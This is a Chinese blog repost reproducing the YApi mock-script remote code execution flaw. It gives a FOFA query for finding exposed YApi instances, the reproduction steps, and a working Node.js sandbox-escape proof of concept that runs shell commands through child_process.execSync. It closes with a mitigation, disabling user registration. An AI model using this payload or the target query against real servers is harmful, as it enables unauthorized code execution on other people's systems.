跟風一波復現Yapi

漏洞描述：

YApi接口管理平臺遠程代碼執行0day漏洞，攻擊者可通過平臺注冊用戶添加接口，設置mock腳本從而執行任意代碼。鑒于該漏洞目前處于0day漏洞利用狀態，強烈建議客戶盡快采取緩解措施以避免受此漏洞影響

fofa：

Fofa:app="YApi"

漏洞復現：

默認注冊功能開啟。
注冊后創建項目：
添加接口：
創建接口成功：

選擇“高級Mock”，“腳本”，開啟腳本：

寫入poc并保存：

const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectConstructor.constructor const myfun = FunctionConstructor('return process') const process = myfun() mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()

預覽：
效果：
Yapi作者已經停止更新。臨時修復建議禁止用戶注冊，具體配置參考原文鏈接：
https://github.com/YMFE/yapi/issues/2099

看完點贊關注不迷路!!! 后續繼續更新優質安全內容!!!

總結

以上是生活随笔為你收集整理的Yapi Mock 远程代码执行漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。